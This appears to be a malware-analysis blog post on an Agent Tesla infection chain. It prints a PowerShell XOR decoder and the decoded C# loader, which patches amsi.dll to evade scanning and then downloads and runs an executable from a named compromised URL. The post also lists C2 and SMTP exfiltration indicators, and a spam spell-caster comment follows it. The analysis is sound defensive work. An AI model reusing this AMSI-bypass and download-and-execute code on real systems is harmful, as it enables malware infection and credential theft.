Tuesday, August 4, 2020

Agent Tesla , Doc => Powershell => C# => EXE => SMTP

https://app.any.run/tasks/27f1e600-b8fc-4c18-a6f0-b35799393cdc/

88cd18b7fbe649bd756b3034525f34c3

function funcDecodeNetClassSourceCode {
 param($paramEncodedNetClassSourceCode)
 $xorKey='s7c5f8';
 $varDecodedNetClassSourceCode='';
 for ($i=0; $i -lt $paramEncodedNetClassSourceCode.length; $i+=2){
  $varEncodedHexBytes=[convert]::ToByte($paramEncodedNetClassSourceCode.Substring($i,2),16);
  $varDecodedChar=[char]($varEncodedHexBytes -bxor $xorKey[($i/2)%$xorKey.length]);
  # write-host ("Encoded: {0} , Decoded: {1}" -f ($varEncodedHexBytes, $varDecodedChar)) # watch every character get xor decoded
  $varDecodedNetClassSourceCode+=$varDecodedChar
 }
 return $varDecodedNetClassSourceCode;
}
$varEncodedNetClassSourceCode = '06440a5b0118204e104103554842105c085f53641a46125d1e193140084c1a5a061b2f560752115a166b1645155c055d000c16460f561417304c154c165a4d710f5914590c4612511044584015511d5043661f4b07520e1b2f774842105c085f53641a46125d1e192d5012037e3d134004541a5443560a590044434c05014700054e3d7c1f5b2a58165701434b170d5d01590659550a511b265b124a0a670c5c084c4e152450126801580074025c0152104644112e4716570a5110171041074c1a5443501e4c16450d152f5607671747465d460e540105103a591765124a5352060005005f4417470f5614171756500d110f071c5d63375b0f7c0b481c45171d445316450d500a0b41154f70084c014e335a0f56070a41790959177b0a571459014e411c3b4806550f5c0518004302410f5b53521b41034a1d172a5b1268074543475f5d150e551d154c015e0d52464f42535b065e11486c27590a711e470c471210515c0647085d1f0451174a7d1d43114c36571a591708446e1a451740075423450c41035b07154a68164d115b0a56464b0756175c0518164f1750145653550c5a0a1802015a0754595b7e0d41364c01171206525b1704561933711d433341141817565a54505e421b165c084c53515753505b5f581641464d1a591715035d120507544f0328730f592f55035811414e1a3852115b035440054d510a54511b265b124a0a670c5c084c4e1531410a751c41067803551c451a174a6b16432f54154c3645115a140515560f4603112e44175412511017064d125d015943430951171712545e0f4403001d2f560767174746504b550751050e5f7e0d41364c01170000055c121b0a5b121809555b045500171e5845135a1f5e0015154c12430a5646511d43435b000b4456021d4f433a591765124a535d0500570c4e455a500001451f1407040d16524b17570a46565205535b470f5656575e4655411c4f031a514b5f000d420342082f5607671747486216450c1c1d711d43334114181d00540c050516025a02525b5b5d0500570c5f405157535d161f4106540d12065300050b46020104540d4a055201560843020604500c46154a1c5d51151f0d02510110165e7c084c2343111b3c5d01584a4e33711d43334114180253000253055b622a5b126807454a005d4d1a591715175b465157025b08485e051d170e4a0551544e5644005a564a49175454004a080b035319094d07171256535e47004a1c1d7a0a43066e3b18100f0756070508071b065714434f05534a080b0e53485d711d4333411418160f550602053e5611460e591f1922590a57107f2459095a125b4b064f033e5611460e591f19205a16415b545b5105595f074f505e0e40534f064f0302565b02510c101f0d5011183a591765124a5b5954025f5b5d630c7c084c45034b1c4d080b07530404115f525b03555c5f044a0e1b450e4417470f5614171057500b440a265b105101580d58035607192450127e1c5b0750146812430b1d2356055e115a08551659171b354816540a540a7e1c5b07501416324713590f5b12430a5a087c1243021c461353153f69005c400e50575e1a531c4342545a4652061d440d17025104040d43154a0e085d04173450047b1f5e065b12105a19275a11561f58025120511f524b42545a4652061d440911035004510c46020004510d10025204500d41070501050944025105540d45075401040941065a04570d12035a01000840060205560d12075b01050945025a045109120650015e0947035605540d42075004510946020605000d43065604510910025605070911075001560945154a19155a4504541c5d6801580050154b2043024712711d510c151e5b11020508085d04173347095b16441066125901432a5b00575b440103550f5a0c3347095b1644101b354c1245171d1e5b1102051c5d4a164316470818430c1e45135a1f5e0015154c12430a56464b07450a5b011804050100035d5b4417470f56141717505f5b411e1846124a1a590415035d46545b08444b445456535e1a484417470f561417110c035e4a015e1744031558111d0f5607170a085603535e5f41030110054d79035614430b0e0f134e054a4e04410752435053014403000825571d41064712162758214c125d5b43060c050a5d641657154c015e0d524e515f054a19570e5a0c110c035e4a0148084e5b1b56111c4e5d460e54010566165256565e635b5e4c074f1d165256565e163f520d5212502e1e5848145d0742115b464a4a52050c50030e4a';
$varNetClassSourceCode = funcDecodeNetClassSourceCode($varEncodedNetClassSourceCode);
write-host ("Everything Decoded: {0}" -f $varNetClassSourceCode)
# Add-Type -TypeDefinition $varNetClassSourceCode; # add malicious code to this powershell session
# [yc947f]::nf37aa(); # initiate malicious code by calling function within the decoded class



---------------------
Results
---------------------
Everything Decoded: using System;using System.Runtime.InteropServices;using System.Diagnostics;using System.IO;using System.N
et;
public class yc947f{[DllImport("kernel32",EntryPoint="GetProcAddress")]public static extern IntPtr e5974c(IntPtr ee5c8,string
 tc65b8d);[DllImport("kernel32",EntryPoint="LoadLibrary")]public static extern IntPtr r9ef96(string w1d838);[DllImport("kerne
l32",EntryPoint="VirtualProtect")]public static extern bool q6922a(IntPtr q34cd35,UIntPtr da9a6f1,uint f4f6c,out uint eea2da)
;[DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]static extern void qa8774c(IntPtr h8bddc6,IntPtr c5
cda,int zb8138d);public static int nf37aa(){IntPtr jf514=r9ef96(w2b5ee("125a105c485c1f5b"));if(jf514!=IntPtr.Zero){IntPtr n77
9c=e5974c(jf514,w2b5ee("325a105c355b12592140005e1645"));if(n779c!=IntPtr.Zero){UIntPtr qdc75=(UIntPtr)5;uint qc5f47=0;if(q692
2a(n779c,qdc75,0x40,out qc5f47)){Byte[] c8dca={0x31,0xff,0x90};IntPtr e863d=Marshal.AllocHGlobal(3);Marshal.Copy(c8dca,0,e863
d,3);qa8774c(new IntPtr(n779c.ToInt64()+0x001b),e863d,3);}}}string sb637=Environment.GetFolderPath(Environment.SpecialFolder.
ApplicationData) + "\\fd393b8" + w2b5ee("5d521b50");new WebClient().DownloadFile(w2b5ee("1b4317455c175c5116520f4c17520256074b
1219115a494f031a005a084c1659171a1348144502510317155e0f5015171c550a1b034016"),sb637);ProcessStartInfo xcb5f=new ProcessStartIn
fo(sb637);Process.Start(xcb5f);return 0;}public static string w2b5ee(string te9c2){string ee5c8="s7c5f8";string r9ef96="";for
(int i=0; i<te9c2.Length;i+=2){byte e5974c=Convert.ToByte(te9c2.Substring(i,2),16);r9ef96+=(char)(e5974c^ee5c8[(i/2)%ee5c8.Le
ngth]);}return r9ef96;}}







https://app.any.run/tasks/27f1e600-b8fc-4c18-a6f0-b35799393cdc/

88cd18b7fbe649bd756b3034525f34c3

using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.IO;
using System.Net;
# [yc947f]::nf37aa() # malicious entry point
public class yc947f{
 [DllImport("kernel32",EntryPoint="GetProcAddress")]
 public static extern IntPtr funcKernel32GetProcAddress(IntPtr paramHandleToDll,string paramLibraryName);
 
 [DllImport("kernel32",EntryPoint="LoadLibrary")]
 public static extern IntPtr funcKernel32LoadLibrary(string paramDllName);

 [DllImport("kernel32",EntryPoint="VirtualProtect")]
 public static extern bool funcKernel32VirtualProtect(IntPtr paramMemoryAddress,UIntPtr paramMemorySize,uint paramNewProtectionValue,out uint paramOldProtectionValue);
 
 [DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]
 static extern void funcKernel32RtlMoveMemory(IntPtr paramDestinationAddress,IntPtr paramSourceAddress,int paramLengthOfBytes);

 public static int nf37aa(){
  # malicious entry point, patching AMSI Dll and a C# downloader
  string varDllName = funcDecodeString("125a105c485c1f5b");
  Console.WriteLine(String.Format("Dll: {0}", varDllName));
  IntPtr varHandleToDll=funcKernel32LoadLibrary(varDllName);
  if(varHandleToDll!=IntPtr.Zero){
   string varFunctionName = funcDecodeString("325a105c355b12592140005e1645");
   Console.WriteLine(String.Format("Function: {0}", varFunctionName));
   IntPtr varHandleToFunction=funcKernel32GetProcAddress(varHandleToDll,varFunctionName);
   if(varHandleToFunction!=IntPtr.Zero){
    UIntPtr varMemorySize=(UIntPtr)5;
    uint varOldProtectValue=0;
    if(funcKernel32VirtualProtect(varHandleToFunction,varMemorySize,0x40,out varOldProtectValue)){
     Byte[] var3BytesToCopy={0x31,0xff,0x90};
     IntPtr varHandleToAllocatedMemory=Marshal.AllocHGlobal(3);
     Marshal.Copy(var3BytesToCopy,0,varHandleToAllocatedMemory,3);
     # funcKernel32RtlMoveMemory(new IntPtr(varHandleToFunction.ToInt64()+0x001b),varHandleToAllocatedMemory,3); # overwrite bytes in function
    }
   }
  }
  string varFileName = funcDecodeString("5d521b50");
  Console.WriteLine(String.Format("File: {0}", varFileName));
  string varFileFullPath=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\fd393b8" + varFileName;
  Console.WriteLine(String.Format("Path: {0}", varFileFullPath));
  string varUrl = funcDecodeString("1b4317455c175c5116520f4c17520256074b1219115a494f031a005a084c1659171a1348144502510317155e0f5015171c550a1b034016");
  Console.WriteLine(String.Format("Url: {0}", varUrl));
  new WebClient().DownloadFile(varUrl,varFileFullPath); # download the malware
  ProcessStartInfo varProcessToRun=new ProcessStartInfo(varFileFullPath);
  # Process.Start(varProcessToRun); # run the malware
  return 0;
 }
 public static string funcDecodeString(string paramEncodedString){
  string varXorKey="s7c5f8";
  string varDecodedString="";
  for (int i=0; i<paramEncodedString.Length; i+=2){
   byte varEncodedByte=Convert.ToByte(paramEncodedString.Substring(i,2),16);
   varDecodedString+=(char)(varEncodedByte^varXorKey[(i/2)%varXorKey.Length]);
  }
  return varDecodedString;
 }
}



Dll: amsi.dll
Path: C:\Users\Win7\AppData\Roaming\fd393b8.exe
Url: http://fugitdeacasa.ro/wp-content/upgrade/files/obi.exe

Agent Tesla

c2 terminal6.veeblehosting.com
tcp port 587

https://app.any.run/tasks/ca52c30e-92fb-41ee-92cf-0483b357cbfb
https://www.virustotal.com/gui/file/ff62a08f679ddad3fae88ea47a3985d003c5dc252e826feac7f59a366487b328/community



agent tesla
https://www.virustotal.com/gui/file/ff62a08f679ddad3fae88ea47a3985d003c5dc252e826feac7f59a366487b328/behavior/C2AE

smtp

port 587

"terminal6.veeblehosting.com"
"obi@a-t-mould.com"
{obi@a-t-mould.com}
{obi@a-t-mould.com}

1 comment:

  1. I want to thank Dr Emu a very powerful spell caster who help me to bring my husband back to me, few month ago i have a serious problem with my husband, to the extend that he left the house, and he started dating another woman and he stayed with the woman, i tried all i can to bring him back, but all my effort was useless until the day my friend came to my house and i told her every thing that had happened between me and my husband, then she told me of a powerful spell caster who help her when she was in the same problem I then contact Dr Emu and told him every thing and he told me not to worry my self again that my husband will come back to me after he has cast a spell on him, i thought it was a joke, after he had finish casting the spell, he told me that he had just finish casting the spell, to my greatest surprise within 48 hours, my husband really came back begging me to forgive him, if you need his help you can contact him with via email: Emutemple@gmail.com or add him up on his whatsapp +2347012841542 is willing to help any body that need his help.

    ReplyDelete